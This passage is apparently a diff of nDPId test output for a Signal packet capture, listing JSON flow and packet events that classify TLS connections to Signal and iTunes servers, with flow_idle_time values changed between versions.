-00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247603,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd68AbvGwW2ECR79gIAQBAtLWAAAAQEICihVUl9kFVbr"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247601,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01422{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569051247643,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247643,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73rrg+UqLaJ6n1qAScSCOEgAAAgQFrAQCCAqWTinBKFVR7gEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1569051247645,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247645,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN66AbtonqfW4PlKjIAQBAspvwAAAQEICihVUhuWTinB"} +00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247599,"flow_last_seen":1569051247645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247645,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247599,"flow_last_seen":1569051247690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247690,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569051247704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247704,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG7wEr7fyfqQK3D1aASaN\/uCAAAAgQFrAQCCApkFVboKFVNgQEDAwg="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569051247706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247706,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrcBKAbtArcPV+38n64AQCBZ9JQAAAQEICihVTfNkFVbo"} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247594,"flow_last_seen":1569051247706,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051247706,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569051247709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247709,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73rtLEL7asq23cqASaN9\/CQAAAgQFrAQCCApkFVbqKFVR7wEDAwg="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569051247711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247711,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd67AbuyrbdySxC+24AQBAsSOAAAAQEICihVUlpkFVbq"} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247600,"flow_last_seen":1569051247711,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247711,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73r1n96jrbdjHEKASaN+tQgAAAgQFrAQCCApkFVbrKFVR8gEDAwg="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G9nMi4fCtwKgCEQG73rwJHv1\/xsFthKASaN+4LQAAAgQFrAQCCApkFVbrKFVR8AEDAwg="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd69Abtt2McQZ\/eo7IAQBAtAbwAAAQEICihVUl9kFVbr"} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247603,"flow_last_seen":1569051247716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd68AbvGwW2ECR79gIAQBAtLWAAAAQEICihVUl9kFVbr"} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247601,"flow_last_seen":1569051247716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01422{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, 